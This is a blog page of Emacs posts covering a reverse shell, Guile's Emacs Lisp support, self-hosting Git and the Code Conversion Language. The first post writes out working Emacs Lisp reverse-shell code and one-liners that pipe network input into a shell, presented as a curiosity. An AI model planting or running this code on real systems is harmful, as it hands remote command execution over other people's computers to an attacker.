Worst Reverse Shell Ever

13/10/2020

Every now and then there’s someone asking about Emacs and security, especially when it comes to the question whether one can trust packages. Short answer: No. Long answer: This question cannot be answered without defining a threat model first, but honestly, who is going to bother backdooring an Emacs package?

Yet some lingering doubt remains. There are Emacs users after all who are high-profile enough to bother attacking. Suppose you wanted to write malware in Emacs Lisp, one obvious thing to try after gaining the ability of arbitrary code execution is a remote shell to comfortably execute commands on someone else’s computer. There are two flavors of them:

Bind shell:
The victim computer listens on LPORT and the attacker connects to LHOST:LPORT. Any user input from the attacker is sent to a local shell, output from that shell is returned to the attacker.
Reverse shell:
The victim computer establishes a connection to the attacker listening at RHOST:RPORT. Much like with the bind shell, user input from the attacker is interpreted by a local shell.

Reverse shells are more popular as they allow circumventing restrictive firewall rules. There are several cheatsheets for spawning them with a Bash/Python/Ruby/Perl/… oneliner, most of those rely on creating a socket, extracting its file descriptor and wiring it up to a shell process. Unfortunately Emacs doesn’t give you that information, so I’ve had to settle for a less elegant approach. Here’s my first attempt using shell-command-to-string to execute the received process output and process-send-string to send it back to the process[1]:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080)))
  (set-process-filter r (lambda (p s)
                          (process-send-string p (shell-command-to-string s))))
  (read-char))

To test it, launch nc -nlvp 8080 (for GNU netcat) or nc -nlv 8080 (for BSD netcat), save the above to test.el and run emacs --script test.el. It works, but is sub-optimal for a few reasons:

  • A new shell is spawned every time a batch of user input has been read. Due to this, changing the directory doesn’t appear to have any effect.
  • The shell seems unresponsive when executing commands generating large output (for example find /) as shell-command-to-string collects everything before returning the entirety of it.
  • If the chunk of user input received by the process filter doesn’t resemble a valid shell command (for example by being broken up at an inconvenient spot), it won’t be executed as expected and might raise an incomprehensible error.

To fix these issues a dedicated shell subprocess needs to be created. Output from the network process is sent to the shell subprocess and vice versa. This makes for slightly longer code:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080))
      (c (start-process "s" nil "sh" "-i")))
  (set-process-filter r (lambda (_ s) (process-send-string c s)))
  (set-process-filter c (lambda (_ s) (process-send-string r s)))
  (read-char))

Voila, cd works as expected and the hangs for find / are gone as well. Time to optimize both for shell oneliners, for that I eliminate whitespace and carefully adjust the logic[2]:

emacs --batch --eval '(set-process-filter(make-network-process :name"r":host"127.0.0.1":service 8080)(lambda(p s)(process-send-string p (shell-command-to-string s))))' -f read-char
emacs --batch --eval '(progn(setq r(make-network-process :name"r":host"127.0.0.1":service 8080)c(start-process"s"nil"sh""-i"))(set-process-filter r(lambda(_ x)(process-send-string c x)))(set-process-filter c(lambda(_ x)(process-send-string r x))))' -f read-char

These clock in at 180 and 261 chars respectively. Not too shabby compared to the usual Python/Ruby/Perl oneliners (243/104/216 chars). Unlike them though I cannot upgrade the reverse shell to a fully interactive one. But who knows, maybe they’ll come in useful some day if I ever encounter a machine not having common programming languages installed, but Emacs for some reason…

[1]Originally this used (while t (sleep-for 0.1)), but thblt pointed out (read-char) as shorter alternative. Bonus: As it’s the last form and takes no arguments, it can be invoked from the Emacs command line with -f read-char.
[2]An obvious optimization I’ve not ended up doing, is using something like (fset 's 'process-send-string) to shorten any lengthy identifiers used more than once; however it doesn’t pay off as the code now contains both single and double quotes. While it is possible to write a shell oneliner with them, extra attention must be paid to quote both kinds correctly. Unless one uses something like the printf command or bash’s $'O\'connor.' notation, escaping the four single quotes ends up requiring more characters than without the optimization.

State of Emacs Lisp on Guile

17/05/2020

Update: Factual corrections to Robin Templeton’s work.

Update: Added an extra set of benchmarks for Guile 3 in a Debian Sid Docker container.

Disclaimer: I don’t use Guile. I hardly know it. There are other Scheme implementations I know far better. But since Guile Emacs is a hot topic with much hopes and unproven claims, I experiment with it every now and then. All “benchmark” results here are to be taken with caution, they’ve been created using Guile 2.2.6 and Emacs 26.3 on a Thinkpad X230t running Arch Linux.

With that out of the way, laurus from #emacs[1] reminded me that one of the reasons why Guile Emacs was possible in the first place is Guile’s language tower, with Emacs Lisp being one of the supported languages. But what does that mean? How complete is the Emacs Lisp support? What can it be used for? These and a few other questions are the topic of this blog post.

In need of a spec

Standardized programming languages have the great benefit of being based on a specification one can consult whenever in doubt of how things are supposed to behave. This allows several competing implementations to be developed, with their own unique strengths and benefits. if you adhere to the standard, switching between implementations isn’t hard and can help shaking out bugs, for example when compiling your C programs with different compilers.

Things get considerably harder if your chosen language decided to forego this approach and the correct behavior is defined by it, yet this didn’t stop people from writing alternative implementations for programming languages such as Python and Ruby. Emacs Lisp got into a similar situation ever since Guile was extended to the degree of supporting Emacs Lisp as an additional language. Provided your version of Guile is new enough, you can evaluate trivial code in the REPL:

scheme@(guile-user)> (define foo 1)
scheme@(guile-user)> foo
$1 = 1
scheme@(guile-user)> ,L elisp
Happy hacking with Emacs Lisp!  To switch back, type `,L scheme'.
elisp@(guile-user)> (defvar bar 2)
$2 = bar
elisp@(guile-user)> bar
$3 = 2

So far so good. But how much of Emacs Lisp is supported? Not much apparently, many common functions like message and error are unbound. It doesn’t seem possible to do anything with buffers or files either. This greatly limits the possibilities of writing useful scripts in Emacs Lisp[2]. One way of determining what exactly is supported would be consulting the source code, but where’s the fun in that when you could instead test it programmatically, thereby creating an executable spec…

Generating the spec

The usual test approaches fail me. Reading test inputs via stdin with read-string? Accessing the arguments with argv? Reading from a file with insert-file-contents? Obtaining an environment variable with getenv? None of that is supported. At least you can print to stdout with princ. I went for a slightly different approach instead, obtain a list of functions/variables[3] in a minimal Emacs environment, then generating a test file that checks their existence and prints a test summary. Here’s the code generation part:

(defun printf (fmt &rest args)
  (princ (apply 'format fmt args)))

(printf ";; elisp spec adherence test
(defvar passed 0)
(defvar failed 0)
(defun test-sym (pred sym)
  (if (funcall pred sym)
      (setq passed (1+ passed))
    (setq failed (1+ failed))))
(defun test-fun (sym) (test-sym 'fboundp sym))
(defun test-var (sym) (test-sym 'boundp sym))\n\n")

(mapatoms
 (lambda (atom)
   (when (fboundp atom)
     (printf "(test-fun '%S)\n" atom))
   (when (and (not (keywordp atom)) (boundp atom))
     (printf "(test-var '%S)\n" atom))))

(printf "\n")
(printf "(princ \"Passed: \")\n")
(printf "(princ passed)\n")
(printf "(terpri)\n")
(printf "\n")
(printf "(princ \"Failed: \")\n")
(printf "(princ failed)\n")
(printf "(terpri)\n")

Assuming it’s been saved as gen-elisp-spec.el, the executable spec itself is generated with emacs -Q --batch --script gen-elisp-spec.el > elisp-spec.el. Here’s a test session using Emacs and Guile:

[wasa@box ~]$ time emacs -Q --batch --script elisp-spec.el
Passed: 9567
Failed: 2
emacs -Q --batch --script elisp-spec.el  0.10s user 0.02s system 99% cpu 0.117 total
[wasa@box ~]$ time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 9432
guile --language=elisp elisp-spec.el  77.62s user 0.27s system 103% cpu 1:15.04 total

This is kind of surprising. I didn’t expect Emacs to fail its own test and didn’t expect Guile to implement this little either. Most surprising is the abysmal speed of the test[4], I’m looking forward to anyone being able to explain that part to me. Here’s one more test using the official Debian Sid Docker image with Emacs 26.3 and Guile 3.0.2:

root@d27668492764:/# time emacs -Q --batch --script elisp-spec.el
Passed: 9108
Failed: 2

real    0m0.104s
user    0m0.097s
sys     0m0.007s
root@d27668492764:/# time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 8973

real    6m20.950s
user    10m32.294s
sys     0m7.846s

This is not exactly an improvement. At least the numbers are small enough to print out the offending symbols, for Emacs it’s atom and printf (which polluted the test environment), for Guile I’ve taken the liberty of annotating the list:

;; binding
let let*
;; functions
lambda apply funcall
;; evaluation
eval load eval-and-compile eval-when-compile
;; sequences
aref aset make-vector nth
;; sequencing
progn prog2 prog1
;; iteration
dolist while
;; control flow
if when unless cond
;; short-circuiting
or and not
;; explicit nonlocal exit
throw catch
;; exceptions
signal condition-case unwind-protect
;; input
read-from-minibuffer
;; output
prin1-to-string print princ send-string-to-terminal terpri
;; cxr
car cdr caar cadr cdar cddr
car-safe cdr-safe
nthcdr
;; associations
assoc assq
;; search
member memql memq
;; destructive list processing
nreverse setcar setcdr rplaca rplacd
;; other list processing
cons list make-list `
mapcar mapc
append concat
reverse
length
;; symbols
defconst defvar defun defmacro
get put
fset set setq setplist
symbol-function symbol-name symbol-plist symbol-value
intern make-symbol
fmakunbound makunbound
quote function
;; plist
plist-get plist-put
lax-plist-get lax-plist-put
plist-member
;; strings
string string-match substring
upcase downcase
;; predicates
zerop floatp stringp numberp integerp wholenump
boundp fboundp functionp symbolp
consp listp nlistp
atom null
;; math
1+ 1-
fceiling ffloor ftruncate fround float
abs
min max
;; comparators
> < >= <= /= =
eq eql equal
string-equal string=
;; numerical operators
+ - * %
;; misc
random

Some notable omissions and differences:

  • No division. Most likely incompatible with Scheme’s numeric tower.
  • Input is read with read-from-minibuffer, not read-string.
  • send-string-to-terminal is unusual to have, but most likely the primitive output function.
  • string-match is nice to have, but of limited use without match-string.
  • prin1-to-string exists, prin1 doesn’t.
  • print doesn’t add newlines and behaves like prin1 should.

To do anything outside of textbook exercises you’d need to define extra primitives. Guile’s module/language/elisp/boot.el shows how to apply a band-aid on some of the previous shortcomings:

(fset '/ (@ (guile) /))
(fset 'read-string 'read-from-minibuffer)
(fset 'prin1 (@ (guile) write))
(defun print (object) (prin1 object) (terpri))

You could write more of it to reach that goal of using Emacs Lisp as scripting language outside of Emacs, but need to write Scheme to get there. Why not just use Scheme? Why invent a new runtime? The effort would be comparable to what node.js did for Chrome’s JavaScript engine, except with a far weaker sales-pitch.

What does this mean for Guile Emacs?

What I’ve shown above is barely sufficient to bootstrap an Emacs on top of it. Guile Emacs requires a customized version of Guile and Emacs, then loads up the supporting Emacs Lisp files to do the rest. There are more incompatibilities, like called-interactively-p being stubbed out. Extending the presented rudimentary spec to contain actual tests would help with tracking progress and usability. It might even improve the overall quality of GNU Emacs itself, provided that the core developers are on board and believe in the idea. I’ve briefly searched emacs-devel for previous discussion on the topic, but only found bikeshedding about Guile Emacs itself, so anyone who feels strongly about the subject, feel free to start a discussion there!

With regards to Guile Emacs itself, the situation is trickier. The above repositories have not been touched for five years, with Robin Templeton being the sole contributor for five Google Summer of Code events. Even though the work is far from complete, it is impressive what a college student managed to do under supervision of Guile’s maintainer Andy Wingo and Ludovic Courtès. Further advancements require similarly motivated individuals to participate in the Guile community and become part of the effort, much like with other free software projects. It’s tempting to take a shortcut like donating to other developers, but unless they’ve figured out a way of converting that money into equivalent work, there will be little connection between what you give away and what they do in return. This again is a topic worth discussing, preferably with the people that can make a change.

[1]laurus did some research as well, you can find an interesting discussion on the #guile channel: http://logs.guix.gnu.org/guile/2020-05-16.log
[2]At least you could now solve SICP in Emacs Lisp with less footguns: You have bignums, lexical scoping by default and TCO!
[3]This isn’t exactly correct, what’s tested for is whether the symbol has its function/value slot bound which may contain other things, for example macros and keywords.
[4]Consider that people like to advocate for Guile Emacs with the argument that it will make for a faster Emacs. While this may hold true in the long term, it’s nowhere near close to that yet. Here’s hoping that Guile 3 will alleviate some of the pain…

Farewell, GitHub

16/05/2020

I’m sorry for the dramatic title. Note that I won’t delete my GitHub account or stop using it, there’s plenty projects hosted there that I contribute to. This blog post is about my experience with hosting my personal projects on GitHub and why I stopped doing that.

What’s wrong with GitHub?

It depends on who you ask. There’s a lot going for GitHub:

  • Pretty Git repo viewer with integrated issue tracker, wiki and more.
  • Many projects chose it as their home.
  • Lots of convenience features.
  • Highly reliable hosting.
  • Social network effects.

On the other hand there’s a few reasons not to use it:

  • Don’t put all your eggs into one basket.
  • Slow and unreliable at times.
  • Owned by Microsoft now.
  • Proprietary SaaS.

All of these are good and important points, but they’re unrelated to my move to selfhosting. Over time I’ve come to dislike the workflow GitHub helped popularizing:

  • Sign up if you haven’t already
  • Fork repository in Browser
  • Clone forked repository
  • Create new branch
  • Perform changes on that branch
  • Push branch
  • Click on “Create pull request” button
  • Describe changes and overall motivation

Some projects required an email-driven workflow, for example by virtue of not being hosted on GitHub and only offering the committer’s email address as contact option:

  • Clone repository
  • Perform changes
  • Format patch
  • Write an email with the patch attached, describing changes and overall motivation

If you’re feeling fancy, you can even set up Git to handle emails for you and combine the last two steps into one. I haven’t done that yet; https://git-send-email.io/ provides a simple tutorial for it explaining the finer details.

I’ve come to enjoy this process considerably more, mostly because it doesn’t waste my time on needless Git operations[1]. Another nice side effect is that one takes more time composing email, thereby resulting in a higher quality conversation with the other project. Similarly, there’s other workflows where public discussion on GitHub is not an option, for example when reporting security issues to a project. In this case it’s common for the project to provide an email address and GPG key for secure communication.

On issue trackers

GitHub’s issue tracker is clean and tidy. It may not be as well suited for large projects, user support or discussing matters beyond bug reports, but that didn’t stop people from using it for all these things. Sometimes they’ll go as far as asking other projects to use GitHub just for that one feature.

I have a completely different problem with it though. Looking back at the timeline between an issue being opened and closed, they tend to either follow the pattern of being resolved quickly (anywhere between a few hours and up to a week) or staying open for a long time, sometimes up to years. Another such pattern is that development activity for my projects tends to start with an initial burst of up to a month, followed by silence and occasional bugfixes. As soon as the project reached good enough or even finished status, chances are that I won’t do any further development on it. Seeing a repository with many open issues makes me unhappy, especially if there’s nothing I can do about it in the short-term. I’ve seen other projects automating their issue tracker grooming by closing issues without recent activity, but it feels dishonest to me and like sweeping the problem under the rug.

For this reason I’ve decided to go with a different approach, following the strategy I’ve come up with for bugs involving attachments that may not be shared publicly for legal reasons[2]: Send me an email and make sure to include the attachment. Whenever I receive an email, I make sure to reply to it, this goes back and forth until a conclusion has been reached (or the issue reporter stops bothering). This worked surprisingly well so far and integrates seamlessly into my inbox zero workflow.

A stupid Git viewer

There is no shortage when it comes to self-hostable Git viewers, but most of them are a tad too social for my needs, with Sourcehut being the closest match. Another issue for me is security, if I can avoid it I’d rather not run software with a history of security issues. After lots of pondering I decided to build a tool for administration of Git repositories and generation of a static website, satisfying the following requirements:

  • Convert an existing repository to a self-hosted one
  • Generate tarballs for all tags[3]
  • Provide a raw view of files
  • Provide a file listing
  • Render READMEs

This excludes a lot of convenience features like browsing the Git history, other branches, syntax highlighting[4], search and so on. To perform these you need to clone the repo and perform the operations locally. This is what I end up doing anyway when searching a repository and doing more serious work. Another bonus of this strategy is having a full copy of the project at hand, which means no more need for a fork button.

My main inspiration design-wise is Evan Hanson’s Git site. The Linux Git User Manual helped figuring out how one sets up Git to pull via HTTPS and push via SSH. Serving a Git repo via HTTPS requires enabling the example post-update hook, to regenerate the files and tarballs a post-receive hook is used. Only a handful of Git commands were necessary for the remaining operations:

  • git init: Initialize (bare) repository
  • git cat-file: Obtain contents of file
  • git update-server-info: Update files for serving via HTTPS
  • git ls-tree: Display (full) file tree with metadata
  • git archive: Create release tarballs
  • git tag: Display tags for release tarballs

This leaves some advanced nginx config. Normally serving a statically generated site is simple, but in this case I want index pages to be served as HTML (using text/html as mimetype) and raw files as plain text (using text/plain as mimetype). Not all raw files though, images, videos and more should still be served with the appropriate mimetype. This took some headscratching and experimentation, but I eventually figured it all out and can fully recommend nginx beyond its traditional role as ridiculously fast HTTP server with great reverse proxying support.

You can find my repositories over at https://depp.brause.cc, with the main repository powering this on https://depp.brause.cc/depp and some auxiliary tools like git-export (convert existing repository to self-hosted one) and git-depp (perform maintenance operations in local repo on remote server, like regenerating static files).

What now?

I’ve successfully migrated all repositories I own and continue maintaining from GitHub. Some of them are pulled in by the MELPA repository and CHICKEN’s egg system. I’ve put up a basic FAQ for contributors and am curious to see whether they’ll bother contributing or whether there will instead be forks of the archived repositories on GitHub.

[1]I already have a clone of the repository, why do I need to clone a fork? After I’m done, why do I need to delete the fork again? If I don’t delete it, why do I have to pull updates using an upstream branch? Bonus: Try explaining all that to someone new to Git.
[2]I’ve happened to write an EPUB mode for Emacs. Most issues can be fixed by carefully studying backtraces, some require the EPUB file that triggered the error. I’d rather not get DMCA notices if I can avoid it, hence why I ask people to share it in private.
[3]CHICKEN Scheme mandates eggs to either provide a file list or tarball for each release. The latter option is far easier to get right.
[4]There is no reason why this couldn’t be implemented in a more generic way. For example there’s a service to serve raw GitHub HTML files of a repo with the text/html mimetype. Something similar could be done for syntax highlighting and more comfortable code view in general, for the rare case where it’s useful.

Code Conversion Language

20/07/2019

Update: I forgot that I did a brief analysis on this many years ago, using ROT13 as example.

Update: Noam Postavsky pointed out on #emacs that CCL is not turing-complete after all as a full simulation (as opposed to just interpreting a single line) requires an Emacs Lisp loop. This loop cannot be done in CCL itself as it doesn’t allow feeding its output back in as input. The I/O restrictions most likely put it into the weaker category of finite-state transducers.

Emacs is most famously, a re-imagination of a Lisp machine, with the Emacs Lisp byte-code interpreter being at its core. A lesser-known fact is that there’s two more byte-code interpreters in its C sources, one for compiled regular expressions and another designed for encoding and decoding text, known as Code Conversion Language (CCL). This blog post will focus on the latter as it’s largely gone unnoticed and hasn’t seen too much experimentation.

The CCL implementation is split into the byte-code interpreter (ccl.c) and compiler (ccl.el) parts. There is no official documentation other than comments and docstrings found in these files. From this I’ve learned that CCL programs are represented as integer vectors and that there’s a higher-level language compiling to them, described in the ccl-define-program docstring. By reading that information I’ve deduced the following:

  • The VM has eight integer-sized registers r0 to r7 and an instruction counter ic
  • Register r7 is used as a status register and may be clobbered at any time by an arithmetic operation
  • A CCL program can either be run on a string and return a string, alternatively it can be run standalone for side effects
  • The former mode requires you to provide a nine-element status vector representing the registers and instruction counter, the latter an eight-element status vector representing the registers only
  • As a side-effect, the status vector contains the new state of the registers and instruction counter after executing the program
  • The VM supports the standard C arithmetic, comparison and assignment operators
  • The language translates several control flow statements to equivalent goto statements, such as if, branch (look-up table) and loop with repeat inside
  • Statements are grouped by surrounding them with parentheses
  • When operating on a string, they are read in and written out in a serial fashion, no random access whatsoever
  • It’s possible to do a look-up on an array, translation table or hash table
  • There is a call operator, but no stack to save/restore arguments to/from, so you’ll have to come up with a calling convention fitting the available registers
  • Each CCL program specifies a magnification factor which determines the ratio between output and input string size

Armed with that knowledge I wrote some boiler plate code for experimentation:

;; -*- lexical-binding: t; -*-

(require 'ccl)

(defvar ccl-status (make-vector 8 0))
(defvar ccl-status+ic (make-vector 9 0))

(defun ccl-init-status (status args)
  (let ((i 0))
    (fillarray status 0)
    (dolist (arg args)
      (aset status i arg)
      (setq i (1+ i)))))

(defun ccl-run (program string &rest args)
  (let ((status ccl-status+ic))
    (ccl-init-status status args)
    (ccl-execute-on-string program status string)))

(defun ccl-run-pure (program &rest args)
  (let ((status ccl-status))
    (ccl-init-status status args)
    (ccl-execute program status)
    status))

There will be some benchmark numbers, none of these are to be taken seriously. Do your own benchmarks before using mine for decisions.

Hello World!

For starters I’ll focus on processing strings. The easiest possible program that still does something useful reads in output and writes it out as is:

(define-ccl-program ccl-identity
  '(1
    (loop
     (read r0)
     (write r0)
     (repeat))))

(ccl-run 'ccl-identity "Hello World!") ;=> "Hello World!"

Let’s go through that program carefully. The S-Expression starts with a magnification factor of 1, meaning that the output buffer should be as large as the input buffer. If it were zero, no I/O would be permitted in the first place, whereas a factor greater than one would allocate enough space to produce a string larger than the input.

The magnification factor is followed by a s-expression that’s executed until it’s done or an error occurred, such as there being no more input. It may be followed by another s-expression that’s executed after the main one, no matter whether it failed with an error or not.

ccl-identity uses a pattern that will come up a few more times in this blog post. It enters a loop, reads a character into the r0 register, writes out a character from the r0 register and jumps to the beginning of the loop. If there are no more characters left, the read operation fails and terminates the loop. Let’s spice things up by adding an extra processing step before writing out the character:

(define-ccl-program ccl-xor
  '(1
    (loop
     (read r1)
     (r1 ^= r0)
     (write r1)
     (repeat))))

(ccl-run 'ccl-xor "Secret" 42) ;=> "yOIXO^"
(ccl-run 'ccl-xor "yOIXO^" 42) ;=> "Secret"

XOR is the bread and butter operator in modern cryptography. A text can be encrypted by replacing each character with the result of XORing it against a secret byte, similarly it can be decrypted by applying the same transformation again. To pass the secret byte as an argument, I’ve placed it in the r0 register and read the string into the r1 register instead. On each iteration of the loop r1 is set to r1 ^ r0 and written out again.

More on translation

In the real world translating characters isn’t as simple as applying some arithmetic to them. Suppose I wanted to challenge the upcase built-in:

(define-ccl-program ccl-upcase
  '(1
    (loop
     (read r0)
     (if (r0 >= ?a)
         (if (r0 <= ?z)
             (r0 -= 32)))
     (write r0)
     (repeat))))

The processing step is a bit more involved this time. If the read-in character appears to be between the a and z characters, transform it by subtracting 32. Why 32? Take a look at an ASCII table and you’ll see that this is the distance between uppercase and lowercase letters. Unfortunately this implementation cannot challenge upcase as it fails to translate non-ASCII characters correctly and is slower than the real deal:

(ccl-run 'ccl-upcase "Hello World!") ;=> "HELLO WORLD!"
(ccl-run 'ccl-upcase "Mötley Crüe") ;=> "MöTLEY CRüE"
(benchmark 100000 '(ccl-run 'ccl-upcase "Hello World!"))
;; => "Elapsed time: 0.165250s (0.072059s in 1 GCs)"
(benchmark 100000 '(upcase "Hello World!"))
;; => "Elapsed time: 0.119050s (0.072329s in 1 GCs)"

Let’s try again with a different text transformation where I actually have a chance to win, ROT13:

(define-ccl-program ccl-rot13
  '(1
    (loop
     (read r0)
     (if (r0 >= ?a)
         (if (r0 <= ?z)
             ((r0 -= ?a)
              (r0 += 13)
              (r0 %= 26)
              (r0 += ?a))))
     (if (r0 >= ?A)
         (if (r0 <= ?Z)
             ((r0 -= ?A)
              (r0 += 13)
              (r0 %= 26)
              (r0 += ?A))))
     (write r0)
     (repeat))))

This time the program needs to recognize two different character ranges to process, lowercase and uppercase ASCII characters. In either case they’re translated to their position in the alphabet, rotated by 13, then translated back to ASCII again. Surprisingly enough, this is enough to beat both rot13-string and rot13-region:

(ccl-run 'ccl-rot13 "Hello World!") ;=> "Uryyb Jbeyq!"
(ccl-run 'ccl-rot13 (ccl-run 'ccl-rot13 "Hello World!"))
;; => "Hello World!"
(benchmark 100000 '(ccl-run 'ccl-rot13 "Hello World!"))
;; => "Elapsed time: 0.248791s (0.072622s in 1 GCs)"
(benchmark 100000 '(rot13-string "Hello World!"))
;; => "Elapsed time: 6.108861s (2.360862s in 32 GCs)"
(with-temp-buffer
  (insert "Hello World!")
  (benchmark 100000 '(rot13-region (point-min) (point-max))))
;; => "Elapsed time: 1.489205s (1.017631s in 14 GCs)"

I then tried to use translation tables for a final example of a “Vaporwave” converter, but failed. Funnily enough this mirrors my overall experience with Emacs, it’s easy to write fun things, but the moment one tries to write something useful, you discover it’s not fun and sometimes not even up to the task. At least it’s possible to salvage the translation tables and use them with translate-region instead, the built-in used by rot13-string and rot13-region:

(defvar ccl-vaporwave-table
  (make-translation-table-from-alist
   (cons '(?\s . 12288)
         (mapcar (lambda (i) (cons i (+ i 65248)))
                 (number-sequence 33 126)))))

(defun vaporwave-it (string)
  (with-temp-buffer
    (insert string)
    (translate-region (point-min) (point-max) ccl-vaporwave-table)
    (buffer-string)))

(vaporwave-it (upcase "aesthetic")) ;=> "AESTHETIC"

Edging towards general-purpose computing

All examples so far have worked on text. If you limit yourself to numbers, you can solve some basic arithmetic problems. Here’s a classic, calculating the factorial of a number:

(define-ccl-program ccl-factorial
  '(0
    ((r1 = 1)
     (loop
      (if r0
          ((r1 *= r0)
           (r0 -= 1)
           (repeat)))))))

(defun factorial (n)
  (let ((acc 1))
    (while (not (zerop n))
      (setq acc (* acc n))
      (setq n (1- n)))
    acc))

While the regular version is more concise, the logic is nearly the same in both. Here’s some numbers:

(aref (ccl-run-pure 'ccl-factorial 10) 1) ;=> 3628800
(factorial 10) ;=> 3628800
(benchmark 100000 '(ccl-run-pure 'ccl-factorial 10))
;; => "Elapsed time: 0.069063s"
(benchmark 100000 '(factorial 10))
;; => "Elapsed time: 0.080212s"

This isn’t nearly as much of a speed-up as I’ve hoped for. Perhaps CCL pays off more when doing arithmetic than for looping? Another explanation is that the Emacs Lisp byte-code compiler has an edge over CCL’s rather simple one. Here’s a more entertaining example, printing out the lyrics of 99 Bottles of Beer on the Wall:

(define-ccl-program ccl-print-bottle-count
  '(1
    (if (r0 < 10)
        (write (r0 + ?0))
      ((write ((r0 / 10) + ?0))
       (write ((r0 % 10) + ?0))))))

(define-ccl-program ccl-99-bottles
  '(1
    (loop
     (if (r0 > 2)
         ((call ccl-print-bottle-count)
          (write " bottles of beer on the wall, ")
          (call ccl-print-bottle-count)
          (write " bottles of beer.\n")
          (write "Take one down and pass it around, ")
          (r0 -= 1)
          (call ccl-print-bottle-count)
          (write " bottles of beer on the wall.\n\n")
          (repeat))
       ((write "2 bottles of beer on the wall, 2 bottles of beer.\n")
        (write "Take one down and pass it around, 1 bottle of beer on the wall.\n\n")
        (write "1 bottle of beer on the wall, 1 bottle of beer.\n")
        (write "Take one down and pass it around, no more bottles of beer on the wall.\n\n")
        (write "No more bottles of beer on the wall, no more bottles of beer.\n")
        (write "Go to the store and buy some more, 99 bottles of beer on the wall.\n"))))))

(defun 99-bottles ()
  (with-output-to-string
    (let ((i 99))
      (while (> i 2)
        (princ (format "%d bottles of beer on the wall, %d bottles of beer.\n" i i))
        (princ (format "Take one down and pass it around, %d bottles of beer on the wall.\n\n" (1- i)))
        (setq i (- i 1))))
    (princ "2 bottles of beer on the wall, 2 bottles of beer.\n")
    (princ "Take one down and pass it around, 1 bottle of beer on the wall.\n\n")
    (princ "1 bottle of beer on the wall, 1 bottle of beer.\n")
    (princ "Take one down and pass it around, no more bottles of beer.\n\n")
    (princ "No more bottles of beer on the wall, no more bottles of beer.\n")
    (princ "Go to the store and buy some more, 99 bottles of beer on the wall.\n")))

This example shows a few more interesting things, generating text of unknown length is rather hard, so I’m using the standard magnification factor of 1 and estimate how big the buffer will be to create an appropriately sized input string. call is useful to not repeat yourself, at the cost of having to carefully plan register usage. Printing out the bottle count can be done if you’re limiting yourself to whole numbers up to 100, a generic solution is going to be hard without random access to the output string. The performance numbers for this one are somewhat surprising:

(let ((input (make-string 15000 ?\s)))
  (benchmark 1000 '(ccl-run 'ccl-99-bottles input 99)))
;; => "Elapsed time: 0.301170s (0.217804s in 3 GCs)"
(benchmark 1000 '(my-99-bottles))
;; => "Elapsed time: 1.735386s (0.507231s in 7 GCs)"

This doesn’t make much sense. Is using format that expensive? It’s hard to tell in advance whether CCL will make a noticable difference or not.

But is it Turing-complete?

My experimentation so far left me wondering, is this language turing-complete? You can perform arithmetics, there’s goto, but the I/O facilities, amount of registers and memory access are limited. The easiest way of proving this property is by implementing another known turing-complete system on top of your current one. I researched a bit and found the following candidates:

  • Brainfuck: A classic, however it requires writable memory. Registers could be used for this, but you don’t have many to play with. You’d need the branch instruction to simulate the data pointer.
  • subleq: Implementing subleq looks easy, but suffers from the same problem as Brainfuck, it requires you to modify an arbitrary memory location. I’ve found a compiler from a C subset to subleq that generates code operating beyond the handful of registers, so that’s not an option either.
  • Rule 110: It’s basically Game of Life, but one-dimensional and can be implemented in a serial fashion. With some tricks it doesn’t require random access either. The proof of it being turing-complete looks painful, but whatever, I don’t care. It’s perfect. There are more elementary cellular automata, so I’ll try to implement it in a generic fashion and demonstrate it on Rule 90 which produces the Sierpinski triangle.
(defmacro define-ccl-automaton (n)
  (let ((print-sym (intern (format "ccl-rule%d-print" n)))
        (rule-sym (intern (format "ccl-rule%d" n))))
    `(progn
       (define-ccl-program ,print-sym
         '(1
           ((r4 = 0)
            (if (r0 == ?1)
                (r4 += 4))
            (if (r1 == ?1)
                (r4 += 2))
            (if (r2 == ?1)
                (r4 += 1))
            (branch r4
                    (write ,(if (zerop (logand n 1)) ?0 ?1))
                    (write ,(if (zerop (logand n 2)) ?0 ?1))
                    (write ,(if (zerop (logand n 4)) ?0 ?1))
                    (write ,(if (zerop (logand n 8)) ?0 ?1))
                    (write ,(if (zerop (logand n 16)) ?0 ?1))
                    (write ,(if (zerop (logand n 32)) ?0 ?1))
                    (write ,(if (zerop (logand n 64)) ?0 ?1))
                    (write ,(if (zerop (logand n 128)) ?0 ?1))))))
       (define-ccl-program ,rule-sym
         '(1
           ((r6 = ,n)
            (r0 = 0)
            (read r1)
            (read r2)
            (loop
             (call ,print-sym)
             (read r3)
             (r0 = r1)
             (r1 = r2)
             (r2 = r3)
             (repeat)))
           ((r0 = r1)
            (r1 = r2)
            (r2 = r5)
            (call ,print-sym)))))))

(define-ccl-automaton 30)
(define-ccl-automaton 90)
(define-ccl-automaton 110)

(defun ccl-sierpinski ()
  (with-output-to-string
    (let ((line "0000000001000000000"))
      (dotimes (_ 20)
        (princ line)
        (terpri)
        (setq line (ccl-run 'ccl-rule90 line))))))

The macro may look scary, but all it does is defining two CCL programs. What an elementary cellular automaton does is looking at the two cells around the current cell, map them to a cell depending to a rule and emit it. There are two edge cases with this for the first and last cell, in my implementation the first cell assumes the previous one was a zero and the last cell uses the first cell. Since there’s no random access, it’s stored into a spare register at the beginning and accessed in a S-Expression after the main loop terminated due to no more input. The surrounding and current cell are stored in three registers and rotated every time a new cell is read in. The mapping is done in the print program by summing up the ones and zeroes, then using the branch instruction to apply the rule to it. If you find this hard to follow, here’s an Emacs Lisp version of it using random access and less limited arithmetic to do the job:

(defun rule--evolve (prev cur next n)
  (let ((acc (+ (if (= prev ?1) 4 0)
                (if (= cur ?1) 2 0)
                (if (= next ?1) 1 0))))
    (if (zerop (logand n (ash 1 acc))) ?0 ?1)))

(defun rule-evolve (line n)
  (let ((out (make-string (length line) ?0)))
    (dotimes (i (length line))
      (cond
       ((zerop i)
        (aset out i (rule--evolve ?0 (aref line i) (aref line (1+ i)) n)))
       ((= i (1- (length line)))
        (aset out i (rule--evolve (aref line (1- i)) (aref line i) (aref line 0) n)))
       (t
        (aset out i (rule--evolve (aref line (1- i)) (aref line i) (aref line (1+ i)) n)))))
    out))

(defun sierpinski ()
  (with-output-to-string
    (let ((line "0000000001000000000"))
      (dotimes (_ 20)
        (princ line)
        (terpri)
        (setq line (rule-evolve line 90))))))

One more benchmark run, this time with less surprising performance numbers:

(benchmark 1000 '(ccl-sierpinski))
